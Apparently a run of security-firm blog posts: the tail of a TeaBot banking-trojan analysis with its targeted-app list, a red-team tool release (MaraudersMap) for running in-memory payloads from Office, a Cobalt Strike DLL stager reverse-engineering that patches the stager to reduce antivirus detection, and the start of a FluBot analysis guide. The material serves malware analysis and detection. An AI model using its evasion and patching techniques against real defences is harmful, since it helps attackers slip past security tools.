Date: Tue, 11 May 2021 12:45:30 GMT

[{"application":"com.ing.banking"},{"application":"com.binance.dev"},{"application":"com.bankinter.launcher"},{"application":"com.unicredit"},{"application":"com.lynxspa.bancopopolare"}, ... ]

Scattered over multiple C2 servers, we could identify the following targeted applications:

app.wizink.es
be.argenta.bankieren
be.axa.mobilebanking
be.belfius.directmobile.android
be.bmid.itsme
be.keytradebank.phone
bvm.bvmapp
com.abnamro.nl.mobile.payments
com.bancomer.mbanking
com.bankaustria.android.olb
com.bankia.wallet
com.bankinter.launcher
com.bbva.bbvacontigo
com.bbva.netcash
com.beobank_prod.bad
com.binance.dev
com.bnpp.easybanking
com.bnpp.easybanking.fintro
com.bpb.mobilebanking.smartphone.prd
com.cajasur.android
com.coinbase.android
com.db.pbc.miabanca
com.db.pbc.mibanco
com.db.pbc.mybankbelgium
com.db.pwcc.dbmobile
com.grupocajamar.wefferent
com.ing.banking
com.ing.mobile
com.kbc.mobile.android.phone.kbc
com.kbc.mobile.android.phone.kbcbrussels
com.kutxabank.android
com.latuabancaperandroid
com.lynxspa.bancopopolare
com.mobileloft.alpha.droid
com.starfinanz.smob.android.bwmobilbanking
com.starfinanz.smob.android.sfinanzstatus
com.triodos.bankingnl
com.unicredit
de.comdirect.android
de.commerzbanking.mobil
de.dkb.portalapp
de.fiducia.smartphone.android.banking.vr
de.ingdiba.bankingapp
de.postbank.finanzassistent
de.santander.presentation
de.sdvrz.ihb.mobile.secureapp.sparda.produktion
de.traktorpool
es.bancosantander.apps
es.cm.android
es.evobanco.bancamovil
es.ibercaja.ibercajaapp
es.lacaixa.mobile.android.newwapicon
es.liberbank.cajasturapp
es.openbank.mobile
es.univia.unicajamovil
eu.unicreditgroup.hvbapptan
it.bnl.apps.banking
it.gruppobper.ams.android.bper
it.nogood.container
it.popso.SCRIGNOapp
net.inverline.bancosabadell.officelocator.android
nl.asnbank.asnbankieren
nl.rabomobiel
nl.regiobank.regiobankieren
piuk.blockchain.android
posteitaliane.posteapp.appbpol
vivid.money
www.ingdirect.nativeframe

Based on this list, 14 Belgian applications are being attacked through the keylogger module. Since all these applications have a strong device onboarding and authentication flow, the impact of the collected information should be limited.

However, if the applications don’t detect the active keylogger, the malware could still collect any information entered by the user into the app. In this regard, the impact is the same as when someone installs a malicious keyboard that logs all the entered information.

Google Play Protect will protect you

The TeaBot sample is currently not known to spread through the Google Play store. That means victims will need to install it by downloading and installing the app manually. Most devices will have Google Play Protect enabled, which will automatically block the currently identified TeaBot samples.

Of course, this is a typical cat & mouse game between Google and malware developers, and who knows how many samples may go undetected …

Conclusion

It’s very interesting to see how TeaBot attacks the Belgian financial applications. While they don’t attempt to social engineer a user into a full device onboarding, the malware developers are finally identifying Belgium as an interesting target.

It will be very interesting to see how these attacks evolve. Eventually all financial applications will have very strong authentication, and then malware developers will either have to be satisfied with only stealing credit card information, or they will have to invest in more advanced tactics with live challenge/responses and active social engineering.

From a development point of view, there’s not much we can do. The Android OS provides the functionality that is abused and it’s difficult to take that functionality away again. Collecting as much information about the device as possible can help in making correct assessments on the risk of certain transactions, but there’s no silver bullet.

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security Assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of the OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map

27 April 2021 at 15:52

This blogpost will be a bit different, as it’s going to tell a bit of a story…

In this blogpost I want to achieve 2 objectives:

  • address a question I keep hearing and seeing pop up in my DMs every now and then (“how do I become a red teamer / a toolsmith / how do I learn more about internals?”), and I will do so by telling you about an experience that happened to me recently;
  • introduce the Marauders Map, heavily inspired by the great work of MDSec’s SharpPack.

Without further ado, let’s get into it…

Why you should think before you run.

Quite recently, one of our clients asked us to do an assessment of their environment. We got an initial foothold through an assumed breach scenario, giving us full access on a workstation as a normal user.
This organization is pretty well secured and has been a client of ours for a few years now. It’s always nice to see your clients mature as you advise them from a consultant’s point of view. That being said, we wanted to try something “different” from our other approaches.

Being a bit of a toolsmith myself, I was already working on two offensive tools; as it turns out, both already existed in the open source world, as pointed out to me by @shitsecure (Fabian Mosch) and @domchell (Dominic Chell). Dominic from MDSec pointed me to a (fairly) old blogpost on their own blog, called SharpPack: The Insider Threat Toolkit, and Fabian pointed me to a cool project from @Flangvik called NetLoader.

If you start releasing tools (or if you are a pentester/red teamer using OST (Open Source Tooling)), you’ll see a few names pop up over and over again. In general, it’s a good idea for both red and blue to keep an eye on their work, as it is often of pretty high quality and nothing less than amazing.

Recently, I came across some discussion in the infosec community about the OSCP and how a student (initially) failed their exam because they ran linPEAS. This brings me to the following point: if you want to become better at something, you should DO IT. A stupid but accurate example which proves my point is the following: if you want to learn to drive a car, you will not learn it from watching other people drive. At some point, you’ll have to take your place behind the wheel and drive for yourself, even if it can be a bit scary.

Coding, pentesting and red teaming are no different. Let me ask you this: if you run tools you did not write yourself, and you never look at the source code of said tools, how can you understand what they do, and more importantly, how are you bringing value to your client? How can you give accurate and to-the-point recommendations if you don’t even know how the exploit or tool works?

Unfortunately, I see a lot of pentesters and even red teamers make this mistake. And to be perfectly honest, I have made that mistake too. I just hope that this post might convince you to think twice before you “go loco” in your client’s infrastructure next time.

The Marauders Map, a copy of SharpPack?

As I was already writing the tooling before I noticed SharpPack was already a thing, I had three options:

  1. Trash my project
  2. Continue my project, taking SharpPack into account
  3. Submit PRs to SharpPack

I was just on the verge of trashing my project when my friend Fabian (@shitsecure) DM’d me after noticing I had removed a tweet, and he said something along the lines of: just continue the project and learn from it. He was right, so two options remained.

My code base was already out of sync with SharpPack; for example, I was leveraging Ionic.Zip to execute binaries from encrypted zips, much like my other tool SharpZipRunner does. Submitting PRs would also mean I would have to test the project extensively to make sure my code would not end up breaking things.

For that reason I decided to continue with the project as a separate one, and honestly, now that the project is release-ready, I’m glad I did it like this, because I learned a thing or two along the way about reflection, such as the Assembly.EntryPoint property. I gave a reflection brown bag a while ago, but as you can see, even an old dog can learn new tricks.

Introducing the Marauders Map

The Marauders Map is quite similar to SharpPack, although there are some subtle differences. As already mentioned, I’m using Ionic’s zip NuGet package for all my encrypted zip shenanigans; additionally, I added functionality to bypass ETW and AMSI (although in the open source version of this project, you will have to bring your own) and to retrieve binaries over the web.

I recommend reading the excellent work of MDSec in their blogpost, but to give you a quick rundown of what the Marauders Map (and SharpPack, by extension) does…

MaraudersMap is a DLL written completely in C# using the DllExport project, which is pretty much magic in a box. This project makes it possible to decorate any static function with the [DllExport] attribute, allowing it to serve as an entry point for unmanaged code.
Essentially, this means you can now run C# using rundll32, for example.

A much more interesting functionality, however, can be seen below:

The primary use case of the Marauders Map is internal pentests, or leg-up scenarios where you get full GUI access to a workstation or Citrix environment.

The Marauders Map can be leveraged from within the Office suite to do all the juicy stuff listed below:

  • Run PowerShell commands such as whoami, or even full-fledged download cradles à la IEX(New-Object … )
  • Run PowerShell scripts from within an encrypted zip, unpacking them completely in memory
  • Run C# binaries from within an encrypted zip, unpacking them completely in memory
  • Run C# binaries fetched from the internet

All these options can be extended with ETW and AMSI bypasses, which are not included in the project by default, attempting to run as-is will result in output stating “bring your own :)”.

It seems to work on both 32-bit and 64-bit Office versions; you just have to compile for the correct architecture.

The GitHub project and its necessary documentation can be found here: https://github.com/NVISOsecurity/blogposts/tree/master/MaraudersMap

Improvement

My initial thought was to get a PowerShell shell running in Office, but for some reason the AllocConsole Win32 API call is not agreeing with Office. If anyone knows how to fix this, submit a PR or give me a shout on Twitter. I had high hopes for this one. RIP PoshOffice (for now at least).

Conclusion

Although open source tooling is great, you should not blindly run any tool you can find on GitHub without proper vetting of said tool first. It could lead to disastrous results, such as leaving a permanent backdoor open in your client’s environment. Additionally, leverage existing OST to hone your own coding skills further; when possible, submit pull requests or create your own versions of existing OST. It will serve as a good school for learning more about coding, but also about the internal workings of specific processes.

Last but not least….

Jean-François Maes

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to helping red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course.

Anatomy of Cobalt Strike’s DLL Stager

26 April 2021 at 16:51

NVISO recently monitored a targeted campaign against one of its customers in the financial sector. The attempt was spotted at its earliest stage following an employee’s report concerning a suspicious email. While no harm was done, we commonly identify any related indicators to ensure additional monitoring of the actor.

The reported email was an application for one of the company’s public job offers and attempted to deliver a malicious document. What caught our attention, besides leveraging an actual job offer, was the presence of execution-guardrails in the malicious document. Analysis of the document uncovered the intention to persist a Cobalt Strike stager through Component Object Model Hijacking.

During my free time I enjoy analyzing samples NVISO spots in-the-wild, and hence further dissected the Cobalt Strike DLL payload. This blog post will cover the payload’s anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.

Execution Flow Analysis

To understand how the malicious code works we have to analyze its behavior from start to end. In this section, we will cover the following flows:

  1. The initial execution through DllMain.
  2. The sending of encrypted shellcode into a named pipe by WriteBufferToPipe.
  3. The pipe reading, shellcode decryption and execution through PipeDecryptExec.

As previously mentioned, the malicious document’s DLL payload was intended to be used as a COM in-process server. With this knowledge, we can already expect some known entry points to be exposed by the DLL.

List of available entry points as displayed in IDA.

While technically the malicious execution can occur in any of the 8 functions, malicious code commonly resides in the DllMain function given that, besides TLS callbacks, it is the function most likely to execute.

DllMain: An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.

docs.microsoft.com/en-us/windows/win32/dlls/dllmain

Throughout the following analysis functions and variables have been renamed to reflect their usage and improve clarity.

The DllMain Entry Point

As can be seen in the following capture, the DllMain function simply executes another function by creating a new thread. This threaded function we named DllMainThread is executed without any additional arguments being provided to it.

Graphed disassembly of DllMain.

Analyzing the DllMainThread function uncovers it is an additional wrapper towards what we will discover is the malicious payload’s decryption and execution function (called DecryptBufferAndExec in the capture).

Disassembly of DllMainThread.

By going one level deeper, we can see the start of the malicious logic. Analysts experienced with Cobalt Strike will recognize the well-known MSSE-%d-server pattern.

Disassembly of DecryptBufferAndExec.

A couple of things occur in the above code:

  1. The sample starts by retrieving the tick count through GetTickCount and then divides it by 0x26AA. While obtaining a tick count is often a time measurement, the next operation solely uses the divided tick as a random number.
  2. The sample then proceeds to call a wrapper around an implementation of the sprintf function. Its role is to format a string into the PipeName buffer. As can be observed, the formatted string will be \\.\pipe\MSSE-%d-server where %d will be the result computed in the previous division (e.g.: \\.\pipe\MSSE-1234-server). This pipe’s format is a well-documented Cobalt Strike indicator of compromise (see the small reconstruction after this list).
  3. With the pipe’s name defined in a global variable, the malicious code creates a new thread to run WriteBufferToPipeThread. This function will be the next one we will analyze.
  4. Finally, while the new thread is running, the code jumps to the PipeDecryptExec routine.
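As a side note, the naming logic from step 2 can be reconstructed as follows (illustration only; System.currentTimeMillis stands in for the Win32 GetTickCount call used by the sample):

// Minimal sketch of the pipe-name construction described above: a pseudo-random
// number derived from the tick count is formatted into the MSSE-%d-server pattern.
fun msseStylePipeName(tickCount: Long = System.currentTimeMillis()): String =
    """\\.\pipe\MSSE-${tickCount / 0x26AA}-server"""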

So far, we had a linear execution from our DllMain entry point until the DecryptBufferAndExec function. We could graph the flow as follows:

Execution flow from DllMain until DecryptBufferAndExec.

As we can see, two threads are now going to run concurrently. Let’s focus ourselves on the one writing into the pipe (WriteBufferToPipeThread) followed by its reading counterpart (PipeDecryptExec) afterwards.

The WriteBufferToPipe Thread

The thread writing into the generated pipe is launched from DecryptBufferAndExec without any additional arguments. By entering the WriteBufferToPipeThread function, we can observe it is a simple wrapper around WriteBufferToPipe, except that it furthermore passes the following arguments recovered from a global Payload variable (pointed to by the pPayload pointer):

  1. The size of the shellcode, stored at offset 0x4.
  2. A pointer to a buffer containing the encrypted shellcode, stored at offset 0x14.
Disassembly of WriteBufferToPipeThread.

Within the WriteBufferToPipe function we can notice the code starts by creating a new pipe. The pipe’s name is recovered from the PipeName global variable which, if you remember, was previously populated by the sprintf function. The code creates a single instance, outbound pipe (PIPE_ACCESS_OUTBOUND) by calling CreateNamedPipeA and then connects to it using the ConnectNamedPipe call.

Graphed disassembly of WriteBufferToPipe‘s named pipe creation.

If the connection was successful, the WriteBufferToPipe function proceeds to loop the WriteFile call as long as there are bytes of the shellcode to be written into the pipe.

Graphed disassembly of WriteBufferToPipe writing to the pipe.

One important detail worth noting is that once the shellcode is written into the pipe, the previously opened handle to the pipe is closed through CloseHandle. This indicates that the pipe’s sole purpose was to transfer the encrypted shellcode.

Once the WriteBufferToPipe function is completed, the thread terminates. Overall the execution flow was quite simple and can be graphed as follows:

Execution flow from WriteBufferToPipe.

The PipeDecryptExec Flow

As a quick refresher, the PipeDecryptExec flow was executed immediately after the creation of the WriteBufferToPipe thread. The first task performed by PipeDecryptExec is to allocate a memory region to receive the shellcode transmitted through the named pipe. To do so, a call to malloc is performed with the shellcode size (stored at offset 0x4 of the global Payload variable) as its argument.

Once the buffer allocation is completed, the code sleeps for 1024 milliseconds (0x400) and calls FillBufferFromPipe with both the buffer location and the buffer size as arguments. Should the FillBufferFromPipe call fail by returning FALSE (0), the code loops back to the Sleep call and attempts the operation again until it succeeds. These Sleep calls and loops are required as the multi-threaded sample has to wait for the shellcode to be written into the pipe.

Once the shellcode is written to the allocated buffer, PipeDecryptExec will finally launch the decryption and execution through XorDecodeAndCreateThread.

Graphed disassembly of PipeDecryptExec.
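
Summarized as JavaScript-style pseudocode (again our own reconstruction from the disassembly, not code contained in the sample), the reader side roughly behaves as follows:

// Hedged pseudocode reconstruction of the PipeDecryptExec wait loop.
function pipeDecryptExec() {
    const buffer = malloc(payload.size);       // shellcode size stored at Payload offset 0x4
    while (true) {
        sleep(0x400);                          // 1024 milliseconds between attempts
        if (fillBufferFromPipe(buffer, payload.size)) {
            break;                             // the writer thread has filled the pipe
        }
    }
    xorDecodeAndCreateThread(buffer, payload.size, payload.key); // key stored at offset 0x8
}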

To transfer the encrypted shellcode from the pipe into the allocated buffer, FillBufferFromPipe opens the pipe in read-only mode (GENERIC_READ) using CreateFileA. As was done for the pipe’s creation, the name is retrieved from the global PipeName variable. If accessing the pipe fails, the function proceeds to return FALSE (0), resulting in the above described Sleep and retry loop.

Disassembly of FillBufferFromPipe‘s pipe access.

Once the pipe is opened in read-only mode, the FillBufferFromPipe function proceeds to copy over the shellcode using ReadFile until the allocated buffer is filled. Once the buffer is filled, the handle to the named pipe is closed through CloseHandle and FillBufferFromPipe returns TRUE (1).

Graphed disassembly of FillBufferFromPipe copying data.

Once FillBufferFromPipe has successfully completed, the named pipe has completed its task and the encrypted shellcode has been moved from one memory region to another.

Back in the caller PipeDecryptExec function, once the FillBufferFromPipe call returns TRUE, the XorDecodeAndCreateThread function gets called with the following parameters:

  1. The buffer containing the copied shellcode.
  2. The length of the shellcode, stored at the global Payload variable’s offset 0x4.
  3. The symmetric XOR decryption key, stored at the global Payload variable’s offset 0x8.

Once invoked, the XorDecodeAndCreateThread function starts by allocating yet another memory region using VirtualAlloc. The allocated region has read/write permissions (PAGE_READWRITE) but is not executable. By not making a region writable and executable at the same time, the sample possibly attempts to evade security solutions which only look for PAGE_EXECUTE_READWRITE regions.

Once the region is allocated, the function loops over the shellcode buffer and decrypts each byte using a simple xor operation into the newly allocated region.

Graphed disassembly of XorDecodeAndCreateThread.
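
The decryption itself is trivial. In JavaScript-style pseudocode it boils down to XOR-ing every byte of the buffer with the key recovered from the Payload structure (a hedged sketch; whether the key is a single byte or a short repeating sequence does not change the idea):

// Hedged sketch of the XOR decryption loop.
function xorDecode(encrypted, key) {
    const decrypted = new Uint8Array(encrypted.length);
    for (let i = 0; i < encrypted.length; i++) {
        decrypted[i] = encrypted[i] ^ key[i % key.length]; // repeat the key if it is shorter than the data
    }
    return decrypted;
}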

When the decryption is complete, the GetModuleHandleAndGetProcAddressToArg function is called. Its role is to place pointers to two valuable functions into memory: GetModuleHandleA and GetProcAddress. These functions should enable the shellcode to further resolve additional procedures without relying on them being imported. Before storing these pointers, the GetModuleHandleAndGetProcAddressToArg function first ensures a specific value is not FALSE (0). Surprisingly enough, this value stored in a global variable (here called zero) is always FALSE, resulting in the pointers never being stored.

Graphed disassembly of GetModuleHandleAndGetProcAddressToArg.

Back in the caller function, XorDecodeAndCreateThread changes the shellcode’s memory region to be executable (PAGE_EXECUTE_READ) using VirtualProtect and finally creates a new thread. This final thread starts at the JumpToParameter function which acts as a simple wrapper to the shellcode, provided as argument.

Disassembly of JumpToParameter.
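
This allocate-writable-then-flip-to-executable pattern is a useful behavioral indicator in itself. As an illustration, the following hedged Frida sketch flags any VirtualProtect call switching a region to PAGE_EXECUTE_READ (0x20), which is exactly what happens right before the shellcode thread starts:

// Minimal Frida sketch: flag memory regions being flipped to PAGE_EXECUTE_READ.
const PAGE_EXECUTE_READ = 0x20;
Interceptor.attach(Module.getExportByName("kernel32.dll", "VirtualProtect"), {
    onEnter(args) {
        // VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect)
        if (args[2].toInt32() === PAGE_EXECUTE_READ) {
            console.log("VirtualProtect -> PAGE_EXECUTE_READ at " + args[0] + " (" + args[1].toInt32() + " bytes)");
        }
    }
});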

From here, the previously encrypted Cobalt Strike shellcode stager executes to resolve WinINet procedures, download the final beacon and execute it. We will not cover the shellcode’s analysis in this post as it would deserve a post of its own.

While this last flow contained more branches and logic, the overall graph remains quite simple:

Execution flow from PipeDecryptExec until the shellcode.

Memory Flow Analysis

What was the most surprising throughout the above analysis was the presence of a well-known named pipe. Pipes can be used as a defense evasion mechanism by decrypting the shellcode at pipe exit or for inter-process communications; but in our case it merely acted as a memcpy to move encrypted shellcode from the DLL into another buffer.

Memory flow from encrypted shellcode until decryption.

So why would this overhead be implemented? As pointed out by another colleague, the answer lies in the Artifact Kit, a Cobalt Strike dependency:

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. […] One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.

cobaltstrike.com/help-artifact-kit

As we can see in the above diagram, the staging of the encrypted shellcode in the malloc buffer generates a lot of overhead, supposedly for evasion purposes. These operations could be avoided if XorDecodeAndCreateThread instead read directly from the initial encrypted shellcode, as outlined in the next diagram. Avoiding the named pipe would furthermore remove the need for the looped Sleep calls, as the data would be readily available.

Improved memory flow from encrypted shellcode until decryption.

It seems we found a way to reduce the time-to-shellcode; but do popular anti-virus solutions actually get tricked by the named pipe?

Patching the Execution Flow

To test that theory, let’s improve the malicious execution flow. For starters we could skip the useless pipe-related calls and have the DllMainThread function call PipeDecryptExec directly, bypassing pipe creation and writing. How the assembly-level patching is performed is beyond this blog post’s scope as we are just interested in the flow’s abstraction.

Disassembly of the patched DllMainThread.

The PipeDecryptExec function will also require patching to skip malloc allocation, pipe reading and ensure it provides XorDecodeAndCreateThread with the DLL’s encrypted shellcode instead of the now-nonexistent duplicated region.

Disassembly of the patched PipeDecryptExec.

With our execution flow patched, we can furthermore zero-out any unused instructions should these be used by security solutions as a detection base.

When the patches are applied, we end up with a linear and shorter path until shellcode execution. The following graph focuses on this patched path and does not include the leaves beneath WriteBufferToPipeThread.

Outline of the patched (red) execution flow and functions.

As we also figured out how the shellcode is encrypted (we have the XOR key), we modified both samples to redact the actual C2 as it could be used to identify the targeted customer.

To ensure the shellcode did not rely on any bypassed calls, we spun up a quick Python HTTPS server and made sure the redacted domain resolved to 127.0.0.1. We can then invoke both the original and patched DLL through rundll32.exe and observe how the shellcode still attempts to retrieve the Cobalt Strike beacon, proving our patches did not affect the shellcode. The exported StartW function we invoke is a simple wrapper around the Sleep call.

Capture of both the original and patched DLL attempting to fetch the Cobalt Strike beacon.

Anti-Virus Review

So do named pipes actually work as a defense evasion mechanism? While there are efficient ways to measure our patches’ impact (e.g.: comparing across multiple sandbox solutions), VirusTotal does offer a quick primary assessment. As such, we submitted the following versions with redacted C2 to VirusTotal:

  • wpdshext.dll.custom.vir which is the redacted Cobalt Strike DLL.
  • wpdshext.dll.custom.patched.vir which is our patched and redacted Cobalt Strike DLL without named pipes.

As the original Cobalt Strike contains identifiable patterns (the named pipe), we would expect the patched version to have a lower detection ratio, although the Artifact Kit would disagree.

Capture of the original Cobalt Strike’s detection ratio on VirusTotal.
Capture of the patched Cobalt Strike’s detection ratio on VirusTotal.

As we expected, the named-pipe overhead leveraged by Cobalt Strike actually turned out to act as a detection base. As can be seen in the above captures, while the original version (left) obtained only 17 detections, the patched version (right) obtained one less for a total of 16 detections. Among the thrown-off solutions we noticed ESET and Sophos did not manage to detect the pipe-less version, whereas ZoneAlarm couldn’t identify the original version.

One notable observation is that an intermediary patch where the flow is adapted but unused code is not zeroed-out turned out to be the most detected version with a total of 20 hits. This higher detection rate occurs as this patch allows pipe-unaware anti-virus vendors to also locate the shellcode while pipe-related operation signatures are still applicable.

Capture of the intermediary patched Cobalt Strike’s detection ratio on VirusTotal.

While these tests focused on the default Cobalt Strike behavior against the absence of named pipes, one might argue that a customized named pipe pattern would have had the best results. Although we did not think of this variant during the initial tests, we submitted a version with altered pipe names (NVISO-RULES-%d instead of MSSE-%d-server) the day after and obtained 18 detections. As a comparison, our two other samples had their detection rate increase to 30+ over night. We however have to consider the possibility that these 18 detections are influenced by the initial shellcode being burned.

Conclusion

Reversing the malicious Cobalt Strike DLL turned out to be more interesting than expected. Overall, we noticed the presence of noisy operations whose usage wasn’t a functional requirement and which even turned out to act as a detection base. To confirm our hypothesis, we patched the execution flow and observed how our simplified version still reaches out to the C2 server with a slightly lower (almost unaltered) detection rate.

So why does it matter?

The Blue

First and foremost, this payload analysis highlights a common Cobalt Strike DLL pattern allowing us to further fine-tune detection rules. While this stager was the first DLL analyzed, we did take a look at other Cobalt Strike formats such as default beacons and those leveraging a malleable C2, both as Dynamic Link Libraries and Portable Executables. Surprisingly enough, all formats shared this commonly documented MSSE-%d-server pipe name and a quick search for open-source detection rules showed how little it is being hunted for.

The Red

Besides being helpful for NVISO’s defensive operations, this research further strengthens our offensive team’s confidence in their choice of leveraging custom-built delivery mechanisms; even more so following the design choices we documented. The usage of named pipes in operations targeting mature environments is more likely to raise red flags and, at least without altering the default name-generation pattern, does not seem to provide any evasive advantage.


To the next actor targeting our customers: I am looking forward to modifying your samples and testing the effectiveness of altered pipe names.

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified intrusion analyst in NVISO’s Managed Detection & Response team. He spends most of his time investigating incidents and improving detection capabilities. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

How to analyze mobile malware: a Cabassous/FluBot Case study

19 April 2021 at 12:20

This blogpost explains all the steps I took while analyzing the Cabassous/FluBot malware. I wrote this while analyzing the sample and I’ve written down both successful and failed attempts at moving forward, as well as my thoughts/options along the way. As a result, this blogpost is not a writeup of the Cabassous/FluBot malware, but rather a step-by-step guide on how you can examine the malware yourself and what the thought process can be behind examining mobile malware. Finally, it’s worth mentioning that all the tools used in this analysis are open-source / free.

If you want a straightforward writeup of the malware’s capabilities, there’s an excellent technical write up by ProDaft (pdf) and a writeup by Aleksejs Kuprins with more background information and further analysis. I knew these existed before writing this blogpost, but deliberately chose not to read them first as I wanted to tackle the sample ‘blind’.

Our goal: Intercept communication between the malware sample and the C&C and figure out which applications are being attacked.

The sample

Cabassous/FluBot recently popped up in Europe where it is currently expanding quite rapidly. The sample I examined is attacking Spanish mobile banking applications, but German, Italian and Hungarian versions have been spotted recently as well.

In this post, we’ll be taking a look at this sample (acb38742fddfc3dcb511e5b0b2b2a2e4cef3d67cc6188b29aeb4475a717f5f95). I’ve also uploaded this sample to the Malware Bazar website if you want to follow along.

This is live malware

Note that this is live malware and you should never install this on a device which contains sensitive information.

Starting with some static analysis

I usually make the mistake of directly going to dynamic analysis without some recon first, so this time I wanted to start things slow. It also takes some time to reset my phone after it has been infected, so I wanted to get the most out of my first install by placing Frida hooks where necessary.

First steps

The first thing to do is find the starting point of the application, which is listed in the AndroidManifest:

<activity android:name="com.tencent.mobileqq.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.tencent.mobileqq.IntentStarter">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>

So we need to find com.tencent.mobileqq.MainActivity. After opening the sample with Bytecode Viewer, there unfortunately isn’t a com.tencent.mobileqq package. There are however a few other interesting things that Bytecode Viewer shows:

  • There’s a classes-v1.bin file in a folder called ‘dex’. While this file probably contains dex bytecode, it currently isn’t identified by the file utility and is probably encrypted.
  • There is a com.whatsapp package with what appear to be legitimate WhatsApp classes
  • There are three top-level packages that are suspicious: n, np and obfuse
  • There’s a libreactnativeblob.so which probably belongs to WhatsApp as well

Comparing the sample to WhatsApp

So it seems that the malware authors repackaged the official WhatsApp app and added their malicious functionality. Now that we know that, we can compare this sample to the official WhatsApp app and see if any functionality was added in the com.whatsapp folder. A good tool for comparing apks is apkdiff.

Which version to compare to?

I first downloaded the latest version of WhatsApp from the Google Play store, but there were way too many differences between that version and the sample. After digging around the com.whatsapp folder for a bit, I found the AbstractAppShell class which contains a version identifier: 2.21.3.19-play-release. A quick google search leads us to apkmirror which has older versions for download.


So let’s compare both versions using apkdiff:

python3 apkdiff.py ../com.whatsapp_2.21.3.19-210319006_minAPI16\(x86\)\(nodpi\)_apkmirror.com.apk ../Cabassous.apk

Because the malware stripped all the resource files from the original WhatsApp apk, apkdiff identifies 147 files that were modified. To reduce this output, I added ‘xml’ to the ignore list of apkdiff.py on line 14:

at = "at/"
ignore = ".*(align|apktool.yml|pak|MF|RSA|SF|bin|so|xml)"
count = 0

After running apkdiff again, the output is much shorter with only 4 files that are different. All of them differ in their labeling of try/catch statements and are thus not noteworthy.

Something’s missing…

It’s pretty interesting to see that apkdiff doesn’t identify the n, np and obfuse packages. I would have expected them to show up as being added in the malware sample, but apparently apkdiff only compares files that exist in both apks.

Additionally, apkdiff did not identify the encrypted dex file (classes-v1.bin). This is because, by default, apkdiff.py ignores files with the .bin extension.

So to make sure no other files were added, we can run a normal diff on the two smali folders after having used apktool to decompile them:

diff -rq Cabassous com.whatsapp_2.21.3.19-210319006_minAPI16\(x86\)\(nodpi\)_apkmirror.com | grep -i "only in Cabassous/smali"

It looks like no other classes/packages were added, so we can start focusing on the n, np and obfuse packages.

Examining the obfuscated classes

We still need to find the com.tencent.mobileqq.MainActivity class and it’s probably inside the encrypted classes-v1.bin file. The com.tencent package name also tells us that the application has probably been packaged with the tencent packer. Let’s use APKiD to see if it can detect the packer:

Not much help there; it only tells us that the sample has been obfuscated but it doesn’t say with which packer. Most likely the tencent packer was indeed used, but it was then obfuscated with a tool unknown to APKiD.

So let’s take a look at those three packages that were added ourselves. Our main goal is to find any references to System.load or DexClassLoader, but after scrolling through the files using different decompilers in Bytecode Viewer, I couldn’t really find any. The classes use string obfuscation, control flow obfuscation and many of the decompilers are unable to decompile entire sections of the obfuscated classes.

There are however quite some imports for Java reflection classes, so the class and method names are probably constructed at runtime.

We could tackle this statically, but that’s a lot of work. The unicode names are also pretty annoying, and I couldn’t find a script that deobfuscates these, apart from the Pro version of the JEB decompiler. At this point, it would be better to move on to dynamic analysis and create some Frida hooks to figure out what’s happening. But there’s one thing we need to solve first…

How is the malicious code triggered?

How does the application actually trigger the obfuscated functionality? It’s not inside the MainActivity (which doesn’t even exist yet), which is the first piece of code that will be executed when launching the app. Well, this is a trick that’s often used by malware to hide functionality or to perform anti-debugging checks before the application actually starts. Before Android calls the MainActivity’s onCreate method, all required classes are loaded into memory. After they are loaded in memory, all Static Initialization Blocks are executed. Any class can have one of these blocks, and they are all executed before the application actually starts.

The application contains many of these static initializers, both in the legitimate com.whatsapp classes and in the obfuscated classes:

Most likely, the classes-v1.bin file gets decrypted and loaded in one of the static initialization blocks, so that Android can then find the com.tencent.mobileqq.MainActivity and call its onCreate method.

On to Dynamic Analysis…

The classes-v1.bin file will need to be decrypted and then loaded. Since we are missing some classes, and since the file is inside a ‘dex’ folder, it’s a pretty safe bet that it would decrypt to a dex file. That dex file then needs to be loaded using the DexClassLoader. A tool that’s perfect for the job here is Dexcalibur by @FrenchYeti. Dexcalibur allows us to easily hook many interesting functions using Frida and is specifically aimed at apps that use reflection and dynamic loading of classes.
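
For reference, a manual Frida probe for dynamic class loading looks roughly like the sketch below; Dexcalibur generates more complete hooks (covering other class loaders and reflection calls as well), so treat this purely as an illustration of the concept:

// Manual Frida sketch: log every DexClassLoader that gets created.
Java.perform(function () {
    var DexClassLoader = Java.use("dalvik.system.DexClassLoader");
    DexClassLoader.$init.implementation = function (dexPath, optimizedDir, libPath, parent) {
        console.log("DexClassLoader loading: " + dexPath);
        return this.$init(dexPath, optimizedDir, libPath, parent);
    };
});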

